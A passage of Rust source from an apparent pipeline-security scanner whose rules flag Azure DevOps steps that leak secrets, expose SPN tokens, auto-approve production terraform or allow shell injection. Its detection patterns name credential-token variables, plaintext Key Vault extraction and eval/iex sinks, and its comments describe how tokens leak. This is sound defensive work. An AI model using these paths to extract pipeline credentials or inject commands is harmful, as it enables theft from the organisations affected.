/// optional opening quote characters.
fn matches_bash_assignment(lhs: &str) -> bool {
    // Peel an optional assignment keyword.
    let keywords = ["export ", "declare ", "local ", "readonly "];
    let rest = keywords
        .iter()
        .find_map(|k| lhs.strip_prefix(k))
        .unwrap_or(lhs)
        .trim_start();
    // Tolerate opening quotes between the `=` and the secret reference.
    let Some(ident) = rest.trim_end_matches(['"', '\'']).strip_suffix('=') else {
        return false;
    };
    // A valid shell identifier: non-empty, [A-Za-z0-9_]+, no leading digit.
    !ident.is_empty()
        && !ident.starts_with(|c: char| c.is_ascii_digit())
        && ident.chars().all(|c| c.is_ascii_alphanumeric() || c == '_')
}
/// Heuristic: line prefix looks like a PowerShell assignment —
/// `$VAR = `, `$env:VAR = `, or `Set-Variable ... -Value`.
fn matches_powershell_assignment(lhs: &str) -> bool {
    // Peel any opening quote so `$x = "$(SECRET)` reduces to `$x =`.
    let head = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
    // Direct form: something starting with `$` followed by `=`.
    let direct = head
        .strip_suffix('=')
        .map_or(false, |before| before.trim_end().starts_with('$'));
    // Cmdlet form: `Set-Variable ... -Value "$(SECRET)"`.
    direct || (head.contains("Set-Variable") && head.contains("-Value"))
}
/// True for characters allowed in a shell identifier: `[A-Za-z0-9_]`.
fn is_shell_var_char(c: char) -> bool {
    matches!(c, 'a'..='z' | 'A'..='Z' | '0'..='9' | '_')
}
/// Strips the first prefix in `prefixes` that matches the start of `s`,
/// returning the remainder; `None` when no prefix matches.
fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
    prefixes.iter().find_map(|p| s.strip_prefix(p))
}
/// Rule: pipeline secret exported via shell variable inside an inline script.
///
/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
/// log output, but masking happens on the rendered command string before the
/// shell runs. Once the value is bound to a shell variable, downstream
/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
/// `az --debug`) print the cleartext.
pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let script = match step.metadata.get(META_SCRIPT_BODY) {
            Some(s) if !s.is_empty() => s,
            _ => continue,
        };
        // Secrets this step holds that are assigned to shell variables in
        // the script body.
        let exposed: Vec<String> = step_secret_names(graph, step.id)
            .into_iter()
            .filter(|name| script_assigns_secret_to_shell_var(script, name))
            .collect();
        if exposed.is_empty() {
            continue;
        }
        // Show at most three `$(NAME)` references in the message, plus an
        // "and N more" suffix when truncated.
        let total = exposed.len();
        let preview = exposed
            .iter()
            .take(3)
            .map(|s| format!("$({s})"))
            .collect::<Vec<_>>()
            .join(", ");
        let suffix = if total > 3 {
            format!(", and {} more", total - 3)
        } else {
            String::new()
        };
        // Step first, then the Secret nodes whose names were exposed.
        let mut nodes_involved = vec![step.id];
        for edge in graph.edges_from(step.id) {
            if edge.kind != EdgeKind::HasAccessTo {
                continue;
            }
            if let Some(node) = graph.node(edge.to) {
                if node.kind == NodeKind::Secret && exposed.contains(&node.name) {
                    nodes_involved.push(node.id);
                }
            }
        }
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::SecretToInlineScriptEnvExport,
            path: None,
            nodes_involved,
            message: format!(
                "Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
                step.name
            ),
            recommendation: Recommendation::TsafeRemediation {
                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
                explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// How a `resources.repositories[].ref` value resolves for the purposes of
/// the `template_extends_unpinned_branch` rule.
enum RepositoryRefClass {
    /// SHA-pinned, tag-pinned — code at the consumer is immutable.
    Pinned,
    /// No `ref:` field — resolves to the repo's default branch.
    DefaultBranch,
    /// `refs/heads/<name>` or bare branch — mutable.
    MutableBranch(String),
}
/// Classifies a raw `ref:` value. Absent or blank → default branch;
/// 40+ hex chars or `refs/tags/<x>` or `refs/heads/<sha>` → pinned;
/// anything else → a mutable branch name.
fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
    let trimmed = match ref_value.map(str::trim) {
        // Absent or whitespace-only `ref:` resolves to the default branch.
        None | Some("") => return RepositoryRefClass::DefaultBranch,
        Some(t) => t,
    };
    // Bare hex SHA — pinned.
    if is_hex_sha(trimmed) {
        return RepositoryRefClass::Pinned;
    }
    // refs/tags/<x> with a non-empty tag — pinned.
    match trimmed.strip_prefix("refs/tags/") {
        Some(tag) if !tag.is_empty() => return RepositoryRefClass::Pinned,
        _ => {}
    }
    // refs/heads/<x> — mutable, unless the trailing segment is itself a SHA.
    // Any other bare value is treated as a branch name.
    match trimmed.strip_prefix("refs/heads/") {
        Some(branch) if is_hex_sha(branch) => RepositoryRefClass::Pinned,
        Some(branch) => RepositoryRefClass::MutableBranch(branch.to_string()),
        None => RepositoryRefClass::MutableBranch(trimmed.to_string()),
    }
}
/// True for a string of 40 or more hex digits (SHA-1 pins; also accepts the
/// longer SHA-256 form).
fn is_hex_sha(s: &str) -> bool {
    s.len() >= 40 && s.bytes().all(|b| b.is_ascii_hexdigit())
}
/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
/// `-ArgumentList` rather than via env var or stdin.
///
/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
/// ETW process-create events, and ARM extension status — logged for the
/// SAS lifetime.
///
/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
/// the goal is to catch the corpus pattern, not perfect specificity.
pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let Some(body) = step.metadata.get(META_SCRIPT_BODY).filter(|b| !b.is_empty()) else {
            continue;
        };
        let body_lower = body.to_lowercase();
        // Both signals must be present in the same script body.
        if !(body_mints_sas(&body_lower) && body_has_cmdline_sink(&body_lower)) {
            continue;
        }
        // Precision filter: require at least one minted-SAS variable to be
        // interpolated somewhere in the body. This drops scripts that mint
        // a SAS purely for upload-to-blob and never put it on argv.
        let bound_var = powershell_sas_assignments(body)
            .into_iter()
            .find(|v| body_interpolates_var(body, v));
        // If no SAS var could be bound (e.g. inline `az`-CLI subshell),
        // fall back to "mint+sink in same script" — still better than no
        // signal.
        let evidence = match &bound_var {
            Some(v) => format!("$ {v} interpolated into argv"),
            None => "SAS-mint and command-line sink in same script".to_string(),
        };
        out.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::ShortLivedSasInCommandLine,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
                step.name, evidence
            ),
            recommendation: Recommendation::Manual {
                action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
/// Returns true if `line` contains a sink that writes its left-hand-side
/// content to a file path. Recognises the common bash and PowerShell
/// "write to file" idioms.
///
/// Bash side: `>` / `>>` redirection (space-delimited, or glued to a
/// `/`-rooted path) and `tee` (piped into, or line-leading). PowerShell /
/// .NET side: `Out-File`, `Set-Content`, `Add-Content`,
/// `WriteAllText` / `WriteAllLines` — matched case-insensitively.
fn line_writes_to_file(line: &str) -> bool {
    // bash redirection / tee. The previous `">>/"` and `"| tee -"` checks
    // were unreachable: any line containing `">>/"` also contains `">/"`,
    // and any line containing `"| tee -"` also contains `"| tee "`.
    const BASH_SINKS: &[&str] = &[" > ", " >> ", ">/", "| tee "];
    if BASH_SINKS.iter().any(|s| line.contains(s)) || line.starts_with("tee ") {
        return true;
    }
    // PowerShell: Out-File, Set-Content, Add-Content, [IO.File]::WriteAllText
    let lower = line.to_lowercase();
    const PS_SINKS: &[&str] = &[
        "out-file",
        "set-content",
        "add-content",
        "writealltext",
        "writealllines",
    ];
    PS_SINKS.iter().any(|s| lower.contains(s))
}
/// Returns true if `line` references a workspace path macro or a
/// config-file extension we consider risky for secret materialisation.
/// All matching is case-insensitive substring containment.
fn line_references_workspace_path(line: &str) -> bool {
    // ADO workspace-directory macros (lowercased forms).
    const WORKSPACE_MACROS: &[&str] = &[
        "$(system.defaultworkingdirectory)",
        "$(build.sourcesdirectory)",
        "$(pipeline.workspace)",
        "$(agent.builddirectory)",
        "$(agent.tempdirectory)",
    ];
    // Common credential / config file extensions
    const RISKY_EXT: &[&str] = &[
        ".tfvars",
        ".env",
        ".hcl",
        ".pfx",
        ".key",
        ".pem",
        ".crt",
        ".p12",
        ".kubeconfig",
        ".jks",
        ".keystore",
    ];
    let lower = line.to_lowercase();
    WORKSPACE_MACROS
        .iter()
        .chain(RISKY_EXT.iter())
        .any(|needle| lower.contains(needle))
}
/// Heuristic: returns true if `script` materialises `secret` to a workspace
/// file. Looks for a single line that contains the secret reference AND a
/// "write to file" sink AND a workspace/credfile path target.
///
/// Also detects the heredoc + Out-File pattern across multiple lines:
/// the secret appears inside a `@" ... "@` block whose final pipe is
/// `Out-File <workspace-path>`.
fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
    let needle = format!("$({secret})");
    let file_write = |l: &str| line_writes_to_file(l) && line_references_workspace_path(l);
    // Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
    // `Out-File ... $(SECRET) ...`, etc.
    if script
        .lines()
        .any(|l| l.contains(&needle) && file_write(l))
    {
        return true;
    }
    // Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
    // being piped into Out-File / Set-Content with a workspace path.
    // Conservative: once a `$x = "$(SECRET)"` assignment is seen, any later
    // line that both writes-to-file and references a workspace path flags.
    // False-positive risk is low because the bound `$x` typically won't be
    // reused for unrelated content within the same inline block.
    let mut bound = false;
    for line in script.lines() {
        let trimmed = line.trim();
        let is_assignment =
            trimmed.contains(&needle) && trimmed.starts_with('$') && trimmed.contains('=');
        if !bound && is_assignment {
            bound = true;
            continue;
        }
        if bound && file_write(line) {
            return true;
        }
    }
    false
}
/// Rule: pipeline secret materialised to a file under the agent workspace.
///
/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
/// remain readable by every subsequent step in the same job.
///
/// One finding per step; `nodes_involved` is ordered `[step, secret...]`.
pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Only inline-script steps can materialise a secret this way.
        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
            continue;
        };
        if script.is_empty() {
            continue;
        }
        // Of the secrets this step can reach, keep those the script body
        // actually writes to a workspace file (heuristic match — see
        // `script_materialises_secret_to_file`).
        let secrets = step_secret_names(graph, step.id);
        let materialised: Vec<String> = secrets
            .into_iter()
            .filter(|s| script_materialises_secret_to_file(script, s))
            .collect();
        if materialised.is_empty() {
            continue;
        }
        // Message preview: first three secret names, plus ", and N more"
        // when the list is longer.
        let n = materialised.len();
        let preview: String = materialised
            .iter()
            .take(3)
            .map(|s| format!("$({s})"))
            .collect::<Vec<_>>()
            .join(", ");
        let suffix = if n > 3 {
            format!(", and {} more", n - 3)
        } else {
            String::new()
        };
        // Resolve matched secret names back to their Secret node ids so the
        // finding links both the step and the secrets involved.
        let secret_node_ids: Vec<NodeId> = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
            .map(|n| n.id)
            .collect();
        let mut nodes_involved = vec![step.id];
        nodes_involved.extend(secret_node_ids);
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::SecretMaterialisedToWorkspaceFile,
            path: None,
            nodes_involved,
            message: format!(
                "Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Returns true if `script` contains a Key Vault → plaintext extraction
/// pattern that lands the secret in a non-`SecureString` variable.
///
/// Covered patterns (all case-insensitive):
/// - `Get-AzKeyVaultSecret ... -AsPlainText` (new syntax)
/// - `Get-AzKeyVaultSecret ... .SecretValueText` (old syntax)
/// - `Get-AzKeyVaultSecret` + `PtrToStringAuto` (oldest, BSTR pattern)
/// - `ConvertFrom-SecureString ... -AsPlainText` (PS 7+ flat extraction)
fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
    let lower = script.to_lowercase();
    let has = |marker: &str| lower.contains(marker);
    let kv_plaintext = has("get-azkeyvaultsecret")
        && (has("-asplaintext") || has(".secretvaluetext") || has("ptrtostringauto"));
    let securestring_plaintext = has("convertfrom-securestring") && has("-asplaintext");
    kv_plaintext || securestring_plaintext
}
/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
/// script. The value never crosses the ADO variable-group boundary so
/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
/// traces) will print the cleartext credential.
///
/// Severity: Medium. Lower than the materialisation rules because the value
/// is at least kept in process memory (vs. on disk), but still a real
/// exposure path that pipeline-level secret rotation alone does not fix.
pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Non-empty inline script body that matches an extraction pattern.
        let extracts = step
            .metadata
            .get(META_SCRIPT_BODY)
            .map(|s| !s.is_empty() && script_extracts_keyvault_to_plaintext(s))
            .unwrap_or(false);
        if !extracts {
            continue;
        }
        out.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::KeyVaultSecretToPlaintext,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
/// Returns true when `name` (case-insensitive) looks like a production
/// service-connection name. Matches `prod` / `production` / `prd` either as
/// the entire name, a token surrounded by `-`/`_`, or a leading/trailing
/// segment (`prod-foo`, `foo-prd`). Conservative: avoids matching
/// substrings like "approver" or "reproduce".
fn looks_like_prod_connection(name: &str) -> bool {
    let lower = name.to_lowercase();
    for tok in ["prod", "production", "prd"] {
        if lower == tok {
            return true;
        }
        // Token delimited on both sides.
        let inner = [format!("-{tok}-"), format!("_{tok}_")];
        if inner.iter().any(|p| lower.contains(p.as_str())) {
            return true;
        }
        // Token as the final segment.
        let tails = [format!("-{tok}"), format!("_{tok}")];
        if tails.iter().any(|p| lower.ends_with(p.as_str())) {
            return true;
        }
        // Token as the leading segment.
        let heads = [format!("{tok}-"), format!("{tok}_")];
        if heads.iter().any(|p| lower.starts_with(p.as_str())) {
            return true;
        }
    }
    false
}
/// Returns true when an inline script body looks like it is laundering
/// federated SPN/OIDC token material into a pipeline variable via
/// `##vso[task.setvariable]`. Used to escalate addspn_with_inline_script's
/// message wording when explicit laundering is detected.
fn script_launders_spn_token(s: &str) -> bool {
    // Well-known env vars / variable names carrying federated token
    // material (lowercased forms).
    const TOKEN_MARKERS: &[&str] = &[
        "$env:idtoken",
        "$env:serviceprincipalkey",
        "$env:serviceprincipalid",
        "$env:tenantid",
        "arm_oidc_token",
        "arm_client_id",
        "arm_client_secret",
        "arm_tenant_id",
    ];
    let lower = s.to_lowercase();
    // Both a setvariable directive and a token marker must be present.
    lower.contains("##vso[task.setvariable")
        && TOKEN_MARKERS.iter().any(|m| lower.contains(m))
}
/// Rule: `terraform apply -auto-approve` against a production service
/// connection without an environment approval gate.
///
/// Combines three signals on a Step node:
/// 1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
///    inline script runs `terraform apply --auto-approve`, or a
///    `TerraformCLI@N` task has `command: apply` + commandOptions
///    containing `auto-approve`).
/// 2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
///    (`prod`, `production`, `prd`), OR the step is linked via
///    `HasAccessTo` to an Identity service-connection node whose name
///    matches that pattern.
/// 3. The step is NOT inside an `environment:`-bound deployment job
///    (parser sets `META_ENV_APPROVAL` for those steps).
///
/// Severity: Critical. Bypasses the only ADO-side change-control on
/// infra rewrites.
pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Signal 1: parser-stamped auto-approve marker.
        let auto_approve = step
            .metadata
            .get(META_TERRAFORM_AUTO_APPROVE)
            .map(|v| v == "true")
            .unwrap_or(false);
        if !auto_approve {
            continue;
        }
        // Signal 2a: Step's own service-connection name (set by parser from
        // azureSubscription / connectedServiceName / etc).
        let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
        // Signal 2b: Walk HasAccessTo edges to find a service-connection
        // Identity. This catches steps that don't carry the name on
        // themselves but inherit an Identity node via the parser's edge.
        let edge_conn = graph
            .edges_from(step.id)
            .filter(|e| e.kind == EdgeKind::HasAccessTo)
            .filter_map(|e| graph.node(e.to))
            .find(|n| {
                n.kind == NodeKind::Identity
                    && n.metadata
                        .get(META_SERVICE_CONNECTION)
                        .map(|v| v == "true")
                        .unwrap_or(false)
            })
            .map(|n| n.name.clone());
        // The direct name wins over the edge-derived one; either way it
        // must look production-named or the step is skipped.
        let conn_name = match direct_conn.or(edge_conn) {
            Some(n) if looks_like_prod_connection(&n) => n,
            _ => continue,
        };
        // Signal 3 / compensating control: an `environment:` binding routes
        // the apply through ADO's approval / check pipeline. Whether that
        // environment *actually* has approvers configured is invisible from
        // YAML — so downgrade Critical → Medium instead of skipping
        // outright (the previous behaviour silently dropped the finding
        // even when the environment was a CI-only approval-free
        // passthrough).
        let env_gated = step
            .metadata
            .get(META_ENV_APPROVAL)
            .map(|v| v == "true")
            .unwrap_or(false);
        let (severity, suffix) = if env_gated {
            (
                Severity::Medium,
                " — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
            )
        } else {
            (
                Severity::Critical,
                " — any committer can rewrite prod infrastructure",
            )
        };
        findings.push(Finding {
            severity,
            category: FindingCategory::TerraformAutoApproveInProd,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
                step.name, conn_name, suffix
            ),
            recommendation: Recommendation::Manual {
                action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
/// script body. The inline script can launder federated SPN material
/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
/// downstream tasks/artifacts un-masked.
///
/// Severity: High. Escalates message wording when the script body contains
/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // The task must opt in to SPN exposure...
        let spn_exposed = step
            .metadata
            .get(META_ADD_SPN_TO_ENV)
            .map(|v| v == "true")
            .unwrap_or(false);
        if !spn_exposed {
            continue;
        }
        // ...and carry a non-blank inline script body.
        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
            continue;
        };
        if body.trim().is_empty() {
            continue;
        }
        // Escalate the message when explicit laundering is visible.
        let suffix = if script_launders_spn_token(body) {
            " — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
        } else {
            ""
        };
        out.push(Finding {
            severity: Severity::High,
            category: FindingCategory::AddSpnWithInlineScript,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
                step.name, suffix
            ),
            recommendation: Recommendation::Manual {
                action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
/// Rule: free-form `type: string` parameter (no `values:` allowlist)
/// interpolated via `${{ parameters.<name> }}` directly into an inline
/// shell/PowerShell script body. ADO does not escape parameter values in
/// YAML emission, so any user with "queue build" can inject shell.
///
/// Detection requires the parser to populate
/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
/// nodes with `META_SCRIPT_BODY`.
///
/// Severity: Medium.
pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
    if graph.parameters.is_empty() {
        return Vec::new();
    }
    // Injectable parameters: no `values:` allowlist AND type `string` or
    // unspecified (ADO's default type is string).
    let injectable: Vec<&str> = graph
        .parameters
        .iter()
        .filter_map(|(name, spec)| {
            let stringy = spec.param_type.is_empty()
                || spec.param_type.eq_ignore_ascii_case("string");
            (!spec.has_values_allowlist && stringy).then(|| name.as_str())
        })
        .collect();
    if injectable.is_empty() {
        return Vec::new();
    }
    let mut out = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
            continue;
        };
        if body.is_empty() {
            continue;
        }
        // Collect every injectable parameter interpolated in the body.
        // Match both `${{ parameters.X }}` and `${{parameters.X}}`.
        let mut hits: Vec<&str> = injectable
            .iter()
            .copied()
            .filter(|name| {
                let spaced = format!("${{{{ parameters.{name} }}}}");
                let tight = format!("${{{{parameters.{name}}}}}");
                body.contains(&spaced) || body.contains(&tight)
            })
            .collect();
        if hits.is_empty() {
            continue;
        }
        hits.sort();
        hits.dedup();
        let names = hits.join(", ");
        out.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::ParameterInterpolationIntoShell,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
                step.name, names
            ),
            recommendation: Recommendation::Manual {
                action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    out
}
/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
/// expansion, a 2-step injection chain.
///
/// **Phase 1 (capture step):** an inline ADO script body
/// (`META_SCRIPT_BODY`) that contains BOTH:
///   - a "terraform output capture" signal — either a literal `terraform
///     output` CLI invocation (with or without `-raw <name>` / `-json`),
///     OR a reference to a `TF_OUT_*` env var (the standard naming
///     convention for env vars sourced from a `TerraformCLI@*`
///     `command: output` task), AND
///   - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
///
/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
/// shell-expansion position, where "shell-expansion position" is any of:
///   - inside `bash -c "..."` / `bash -c '...'`
///   - inside `eval "..."` / `eval '...'` / `eval $(...)`
///   - inside command substitution `$(... $(NAME) ...)`
///   - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
///     in the same script
///   - bare unquoted `$(NAME)` as a command word (line-leading)
///
/// **Severity: High.** Terraform state/outputs are often controlled by
/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
/// access controls than the pipeline itself. The `task.setvariable` hop
/// launders attacker-controlled state through pipeline-variable space —
/// existing rules see only the in-step view.
pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
    // Step 0: collect every Step (in graph insertion order, which matches
    // YAML order) that carries a non-empty script body. Group by job name.
    // Per-step view kept for the scan: node id, display name, script body.
    struct StepInfo<'a> {
        id: NodeId,
        name: &'a str,
        body: &'a str,
    }
    let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
        std::collections::BTreeMap::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let body = match step.metadata.get(META_SCRIPT_BODY) {
            Some(b) if !b.is_empty() => b.as_str(),
            _ => continue,
        };
        // Steps without META_JOB_NAME all land in the "" group — they are
        // still scanned against each other in insertion order.
        let job = step
            .metadata
            .get(META_JOB_NAME)
            .map(String::as_str)
            .unwrap_or("");
        by_job.entry(job).or_default().push(StepInfo {
            id: step.id,
            name: step.name.as_str(),
            body,
        });
    }
    let mut findings = Vec::new();
    for (_job_name, steps) in by_job.iter() {
        // Phase 1: scan every step in this job for capture+setvariable.
        // Each capture step yields zero-or-more (variable_name) outputs.
        let captures: Vec<(usize, Vec<String>)> = steps
            .iter()
            .enumerate()
            .filter_map(|(idx, s)| {
                let vars = capture_phase_variables(s.body);
                if vars.is_empty() {
                    None
                } else {
                    Some((idx, vars))
                }
            })
            .collect();
        if captures.is_empty() {
            continue;
        }
        // Phase 2: for each capture step, look at all later steps in the
        // same job. For each later step, find any captured variable name
        // whose `$(NAME)` reference appears in shell-expansion position
        // within that later step's body.
        // Emits one finding per (capture step, sink step) pair that matches.
        for (cap_idx, vars) in &captures {
            for later_idx in (cap_idx + 1)..steps.len() {
                let sink = &steps[later_idx];
                let mut hits: Vec<&str> = Vec::new();
                for var in vars {
                    if expansion_in_shell_position(sink.body, var) {
                        hits.push(var.as_str());
                    }
                }
                if hits.is_empty() {
                    continue;
                }
                hits.sort();
                hits.dedup();
                let cap = &steps[*cap_idx];
                let names = hits.join(", ");
                findings.push(Finding {
                    severity: Severity::High,
                    category:
                        FindingCategory::TerraformOutputViaSetvariableShellExpansion,
                    path: None,
                    // Ordered [capture step, sink step].
                    nodes_involved: vec![cap.id, sink.id],
                    message: format!(
                        "Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
                        cap.name,
                        names,
                        sink.name,
                        hits[0],
                    ),
                    recommendation: Recommendation::Manual {
                        action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
                    },
                    source: FindingSource::BuiltIn,
                    extras: FindingExtras::default(),
                });
            }
        }
    }
    findings
}
/// Phase-1 helper: given an inline-script body, return the list of
/// pipeline-variable names that the body sets via
/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
/// contains a "terraform output capture" signal.
///
/// We do not attempt to data-flow-link the captured value to the
/// `setvariable` directive — the proximity within a single inline script
/// is the operative signal. The two corpus exemplars
/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
/// capture and the setvariable inside the same PowerShell block.
fn capture_phase_variables(body: &str) -> Vec<String> {
    if body_has_terraform_output_capture(body) {
        setvariable_names_in(body)
    } else {
        Vec::new()
    }
}
/// True iff the body contains a terraform-output capture signal: either a
/// literal `terraform output` CLI invocation, or a `TF_OUT_*` env-var
/// reference (the convention used by the `TerraformCLI@*` task family,
/// where `command: output` surfaces results as `TF_OUT_<name>` env vars).
///
/// Matching is case-sensitive on purpose — the terraform CLI is always
/// lowercase, and the `$`/`${` prefixes keep `$TF_OUT_X` / `${TF_OUT_X}`
/// from matching unrelated substrings like `MY_TF_OUT_X`.
fn body_has_terraform_output_capture(body: &str) -> bool {
    const CAPTURE_MARKERS: &[&str] = &[
        // Literal CLI invocation.
        "terraform output",
        // PowerShell env-var forms.
        "$env:TF_OUT_",
        "${env:TF_OUT_",
        // POSIX shell forms.
        "$TF_OUT_",
